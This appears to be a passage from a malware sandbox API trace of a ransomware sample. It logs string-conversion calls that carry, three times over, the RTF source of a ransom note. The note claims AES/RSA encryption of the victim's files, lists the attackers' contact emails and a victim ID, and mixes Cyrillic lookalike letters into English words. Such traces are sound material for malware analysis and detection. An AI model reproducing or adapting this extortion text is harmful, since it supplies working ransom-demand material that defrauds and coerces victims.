str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0136.015] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e943a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 